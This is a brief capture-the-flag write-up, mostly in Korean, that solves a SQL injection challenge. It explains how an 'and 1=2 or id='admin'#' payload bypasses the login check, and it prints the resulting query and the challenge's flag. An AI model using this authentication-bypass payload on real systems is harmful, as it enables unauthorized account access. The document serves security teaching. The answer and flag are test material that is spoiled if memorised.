SQLinjection★★★★

Simple SQL injection!
link

SQL injection문제다.
admin으로 로그인을 하는것이 목표이므로 앞 조건 부분에and 1=2를 붙여줘서 항상 거짓으로 만든 뒤,or id='admin'을 통해idadmin인 계정으로 로그인 할 수 있게 끔 한다.

완성된 쿼리 : SELECT id,pw FROM table_kkk WHERE id='' and pw='' and 1=2 or id='admin'#';

Flag:GoN{I_SQLI_U}

results matching ""

    No results matching ""